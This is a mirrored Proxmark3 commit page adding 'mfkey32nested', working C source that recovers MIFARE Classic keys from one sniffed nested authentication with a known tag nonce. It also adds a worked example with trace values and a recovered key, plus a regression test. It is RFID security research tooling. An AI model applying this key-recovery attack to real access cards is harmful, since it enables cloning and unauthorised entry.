github/RRG-Proxmark3
1
0
Fork 0
mirror of https://github.com/RfidResearchGroup/proxmark3.git synced 2025-08-14 10:37:23 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Add : recovering partial nested authentication with known nT

Browse source
This commit is contained in:
Philippe Teuwen 2024-09-03 23:37:33 +02:00
commit 28076af96d
5 changed files with 108 additions and 2 deletions
Download patch file Download diff file Expand all files Collapse all files

1
CHANGELOG.md
View file

@ -3,6 +3,7 @@ All notable changes to this project will be documented in this file.
This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log...
## [unreleased][unreleased]
- Added `mfkey32nested`: recovering partial nested authentication with known nT (@doegox)
- Added support for dumping FM11RF08S data at once (@doegox)
- Added support for collecting all FM11RF08S nT/{nT}/par_err at once (@doegox)
- Fixed `hf mfu wrbl` - compatibility write only writes 4 bytes. Now handled correctly (@iceman1001)

3
tools/mfc/card_reader/Makefile
View file

@ -9,7 +9,7 @@ ifneq ($(SKIPPTHREAD),1)
MYLDLIBS += -lpthread
endif
BINS = mfkey32 mfkey32v2 mfkey64 mf_nonce_brute mf_trace_brute
BINS = mfkey32 mfkey32v2 mfkey32nested mfkey64 mf_nonce_brute mf_trace_brute
INSTALLTOOLS = $(BINS)
include $(ROOTPATH)/Makefile.host
@ -28,6 +28,7 @@ endif
mfkey32 : $(OBJDIR)/mfkey32.o $(MYOBJS)
mfkey32v2 : $(OBJDIR)/mfkey32v2.o $(MYOBJS)
mfkey32nested : $(OBJDIR)/mfkey32nested.o $(MYOBJS)
mfkey64 : $(OBJDIR)/mfkey64.o $(MYOBJS)
mf_nonce_brute : $(OBJDIR)/mf_nonce_brute.o $(MYOBJS)
mf_trace_brute : $(OBJDIR)/mf_trace_brute.o $(MYOBJS)

69
tools/mfc/card_reader/mfkey32nested.c Normal file
View file

@ -0,0 +1,69 @@
// Doegox, 2024, cf https://eprint.iacr.org/2024/1275 for more info
#include <inttypes.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include "crapto1/crapto1.h"
#include "util_posix.h"
int main(int argc, char *argv[]) {
struct Crypto1State *s, *t;
uint64_t key; // recovered key
uint32_t uid; // serial number
uint32_t nt; // tag nonce
uint32_t nt_enc; // encrypted tag nonce
uint32_t nr_enc; // encrypted reader nonce
uint32_t ar; // reader response
uint32_t ar_enc; // encrypted reader response
uint32_t ks0; // keystream used to encrypt tag nonce
uint32_t ks2; // keystream used to encrypt reader response
printf("MIFARE Classic key recovery - known nT scenario\n");
printf("Recover key from one reader authentication answer only\n");
if (argc != 6) {
printf("syntax: %s <uid> <nt> <{nt}> <{nr}> <{ar}>\n\n", argv[0]);
return 1;
}
sscanf(argv[1], "%x", &uid);
sscanf(argv[2], "%x", &nt);
sscanf(argv[3], "%x", &nt_enc);
sscanf(argv[4], "%x", &nr_enc);
sscanf(argv[5], "%x", &ar_enc);
printf("Recovering key for:\n");
printf(" uid: %08x\n", uid);
printf(" nt: %08x\n", nt);
printf(" {nt}: %08x\n", nt_enc);
printf(" {nr}: %08x\n", nr_enc);
printf(" {ar}: %08x\n", ar_enc);
printf("\nLFSR successor of the tag challenge:\n");
ar = prng_successor(nt, 64);
printf(" ar: %08x\n", ar);
printf("\nKeystream used to generate {nt}:\n");
ks0 = nt_enc ^ nt;
printf(" ks0: %08x\n", ks0);
printf("\nKeystream used to generate {ar}:\n");
ks2 = ar_enc ^ ar;
printf(" ks2: %08x\n", ks2);
s = lfsr_recovery32(ks0, uid ^ nt);
for (t = s; t->odd | t->even; ++t) {
crypto1_word(t, nr_enc, 1);
if (ks2 == crypto1_word(t, 0, 0)) {
lfsr_rollback_word(t, 0, 0);
lfsr_rollback_word(t, nr_enc, 1);
lfsr_rollback_word(t, uid ^ nt, 0);
crypto1_get_lfsr(t, &key);
printf("\nFound Key: [%012" PRIx64 "]\n\n", key);
break;
}
}
free(s);
return 0;
}

33
tools/mfc/card_reader/mfkey_examples.md
View file

@ -103,3 +103,36 @@ Decrypted communication:
Found Key: [091e639cb715]
```
### Recovering partial nested authentication
A new functionality from @doegox
In some situations, we may replay a {nT} in a nested authentication, of which we know the plain nT but not the key.
Example:
```
Tag |ab! b3! 0b! D1 | | AUTH: nt (enc)
Rdr |46 03 39 66 AD c1! 81 62! | | AUTH: nr ar (enc)
```
```
./mfkey32v2nested 5C467F63 4bbf8a12 abb30bd1 46033966 adc18162
MIFARE Classic key recovery - known nT scenario
Recover key from one reader authentication answer only
Recovering key for:
uid: 5c467f63
nt: 4bbf8a12
{nt}: abb30bd1
{nr}: 46033966
{ar}: adc18162
LFSR successor of the tag challenge:
ar: 77cc87f8
Keystream used to generate {nt}:
ks0: e00c81c3
Keystream used to generate {ar}:
ks2: da0d069a
Found Key: [059e2905bfcc]
```

4
tools/pm3_tests.sh
View file

@ -290,11 +290,13 @@ while true; do
if ! CheckFileExist "fpgacompress exists" "$FPGACPMPRESSBIN"; then break; fi
fi
if $TESTALL || $TESTMFKEY; then
echo -e "\n${C_BLUE}Testing mfkey:${C_NC} ${MFKEY32V2BIN:=./tools/mfc/card_reader/mfkey32v2} ${MFKEY64BIN:=./tools/mfc/card_reader/mfkey64}"
echo -e "\n${C_BLUE}Testing mfkey:${C_NC} ${MFKEY32V2BIN:=./tools/mfc/card_reader/mfkey32v2} ${MFKEY32NESTEDBIN:=./tools/mfc/card_reader/mfkey32nested} ${MFKEY64BIN:=./tools/mfc/card_reader/mfkey64}"
if ! CheckFileExist "mfkey32v2 exists" "$MFKEY32V2BIN"; then break; fi
if ! CheckFileExist "mfkey32nested exists" "$MFKEY32NESTEDBIN"; then break; fi
if ! CheckFileExist "mfkey64 exists" "$MFKEY64BIN"; then break; fi
# Need a decent example for mfkey32...
if ! CheckExecute "mfkey32v2 test" "$MFKEY32V2BIN 12345678 1AD8DF2B 1D316024 620EF048 30D6CB07 C52077E2 837AC61A" "Found Key: \[a0a1a2a3a4a5\]"; then break; fi
if ! CheckExecute "mfkey32nested test" "$MFKEY32NESTEDBIN 5C467F63 4bbf8a12 abb30bd1 46033966 adc18162" "Found Key: \[059e2905bfcc\]"; then break; fi
if ! CheckExecute "mfkey64 test" "$MFKEY64BIN 9c599b32 82a4166c a1e458ce 6eea41e0 5cadf439" "Found Key: \[ffffffffffff\]"; then break; fi
if ! CheckExecute "mfkey64 long trace test" "$MFKEY64BIN 14579f69 ce844261 f8049ccb 0525c84f 9431cc40 7093df99 9972428ce2e8523f456b99c831e769dced09 8ca6827b ab797fd369e8b93a86776b40dae3ef686efd c3c381ba 49e2c9def4868d1777670e584c27230286f4 fbdcd7c1 4abd964b07d3563aa066ed0a2eac7f6312bf 9f9149ea" "Found Key: \[091e639cb715\]"; then break; fi
fi